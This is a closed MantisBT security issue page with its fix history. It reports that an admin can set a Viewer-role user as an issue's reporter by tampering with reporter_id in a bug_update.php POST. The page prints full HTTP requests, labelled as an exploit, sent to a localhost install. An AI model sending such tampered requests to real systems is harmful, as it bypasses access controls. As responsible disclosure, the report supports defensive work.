View Issue Details

ID: 0027350
Project: mantisbt
Category: security
View Status: public
Last Update: 2020-12-30 07:37
Reporter: d3vpoo1
Assigned To: dregad
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Platform: Windows
OS: Windows
OS Version: Windows10
Product Version: 2.24.3
Target Version: 2.24.4
Fixed in Version: 2.24.4
Summary: 0027350: When updating an issue, a Viewer user can be set as Reporter
Description

This is the same as my old report (if I am correct); however, this allows the admin to set the reporter to a viewer role.

This can be found in bug_update.php and the parameter reporter_id, which, if the admin sets it to the id of a viewer, will show the viewer as having reported the issue.

Steps To Reproduce
  • As admin go to any issues

  • Click the Edit button

  • it will redirect to bugs/bug_report_page.php

  • Edit the value of reporter

In the normal case the select input will render "admin" or those roles that can access it, like updater, manager etc., but the viewer is not included

  • Open your proxy

  • Set it to anything and click the Update Information button

Request

POST /mantisbt/bug_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 504
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/bug_update_page.php?bug_id=1&reporter_edit=true
Cookie: MANTIS_collapse_settings=|sidebar:1; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=561q750p34t3qbvgmm7p3jc3nr; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=075ae51b44729bb373d475b9049d227e104536a82d905c235d985da478725b21
Upgrade-Insecure-Requests: 1

bug_update_token=20200926zspEME1SbPkF6CSte-bC0TC8FltyOYtv&bug_id=1&last_updated=1601112082&category_id=1&view_state=10&reporter_id=6&handler_id=6&priority=30&severity=50&reproducibility=70&status=50&resolution=10&platform=&os=&os_build=&summary=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&description=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&steps_to_reproduce=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&additional_information=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&bugnote_text=

Response

HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 09:24:52 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 09:24:52 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 09:24:52 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/view.php?id=1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

Exploit

  • Do the same thing but change the value of reporter_id to a viewer user; in my case my viewer id is 3

Exploit request

POST /mantisbt/bug_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 504
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/bug_update_page.php?bug_id=1&reporter_edit=true
Cookie: MANTIS_collapse_settings=|sidebar:1; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=561q750p34t3qbvgmm7p3jc3nr; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=075ae51b44729bb373d475b9049d227e104536a82d905c235d985da478725b21
Upgrade-Insecure-Requests: 1

bug_update_token=20200926PewmDfYCD7hbBvP9CIB-F4lpijxiHAiy&bug_id=1&last_updated=1601112292&category_id=1&view_state=10&reporter_id=3&handler_id=6&priority=30&severity=50&reproducibility=70&status=50&resolution=10&platform=&os=&os_build=&summary=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&description=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&steps_to_reproduce=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&additional_information=DEVELOPER+TEST+REPORT+-+%3Ch1%3ETest%3C%2Fh1%3E&bugnote_text=

Exploit response

HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 09:26:14 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 09:26:14 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 09:26:14 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/view.php?id=1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

  • Refresh the site and you can see that the viewer has become the reporter

Additional Information

I tried to edit the handler_id and set it to viewer, but it just returns Application Error 17

In case you need a PoC, please mention it (I can't upload any attachment right now due to internet issues).

Tags: No tags attached.

Relationships

related to 0027268 (closed, dregad): Admin can get issues assigned to users not allowed to handle them

Activities

d3vpoo1

2020-10-13 00:39

reporter   ~0064544

Hi! Any possible update here and on other tickets?

dregad

2020-11-21 20:08

developer   ~0064675

Problem is confirmed. An extra sanity check will be added to Bug Update page to prevent this scenario.

d3vpoo1

2020-11-22 18:29

reporter   ~0064679

Thank you for the update, and I apologize again for the extra work for the 2.4.x version.

dregad

2020-11-22 18:53

developer   ~0064681

Thanks for your patience, and sorry it took me so long to get around to this.
Spent a good bit of my week-end working on your (and other) security issues. Was hoping to have a patch for all of them, but didn't quite make it. Stay tuned.

d3vpoo1

2020-11-24 18:34

reporter   ~0064696

Last edited: 2020-12-02 20:06

Greetings! Thank you for the experience and for the CVEs. As I promised, this batch of reports will be my last issues/submissions (including the GitHub issues). The whole experience was fun and I learned a lot from this open source: I read the documentation, searched a lot of different implementations (for addons), used Git for integration and even wrote my first exploit... In the near future I would like to test this one again and even recommend this platform... Once again, thank you so much, and I apologize for the extra work...

Related Changesets

MantisBT: master 06524d75

2020-11-21 23:25

dregad

Ensure given Reporter is allowed to report issues

When updating an issue, if the user specified as reporter does not have
sufficient access level to report issues, throw an error.

Fixes 0027350
Affected Issues: 0027350
mod - bug_update.php

MantisBT: master a528b607

2020-12-05 13:22

dregad

Allow bug update if original reporter missing

Adding validation on reporter id caused Mantis to trigger error and
prevent bug update, when editing a bug and the user who reported it
no longer exists.

Issue 0027350
Affected Issues: 0027350
mod - bug_update.php
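
The server-side check that the two changesets above describe, written here as an added, self-contained example; it is not MantisBT's code from bug_update.php. The function name, the in-memory user table and the role assumed for user 6 are hypothetical; the access level values follow MantisBT's defaults, and skipping the check when the reporter is unchanged is one assumed way to keep issues from deleted reporters editable.

```php
<?php
declare(strict_types=1);

// Access levels as numeric ranks (values follow MantisBT's defaults).
const VIEWER = 10;
const REPORTER = 25;
const DEVELOPER = 55;
const ADMINISTRATOR = 90;

// Constructed sample data: user id => access level in the project.
// Id 3 is the viewer from the report; id 42 is a deleted account (absent).
const USERS = [1 => ADMINISTRATOR, 3 => VIEWER, 6 => DEVELOPER];
const REPORT_BUG_THRESHOLD = REPORTER; // assumed minimum level to report

/**
 * Hypothetical helper: validate the reporter_id submitted on issue update.
 * Returns null when acceptable, otherwise an error message.
 */
function check_reporter_change(int $existing_id, int $submitted_id): ?string {
    // Unchanged reporter: accept even if the account no longer exists,
    // otherwise issues reported by deleted users could never be edited.
    if ($submitted_id === $existing_id) {
        return null;
    }
    // A changed reporter must be an existing account...
    if (!array_key_exists($submitted_id, USERS)) {
        return "user $submitted_id does not exist";
    }
    // ...whose access level meets the reporting threshold. The edit form's
    // dropdown already filters on this, but the POST body is client-controlled.
    if (USERS[$submitted_id] < REPORT_BUG_THRESHOLD) {
        return "user $submitted_id is not allowed to report issues";
    }
    return null;
}

// Constructed cases: [existing reporter, submitted reporter_id]
$cases = [[1, 6], [1, 3], [42, 42], [1, 42]];
foreach ($cases as [$old, $new]) {
    $err = check_reporter_change($old, $new);
    printf("%d -> %d: %s\n", $old, $new, $err ?? 'accepted');
}
```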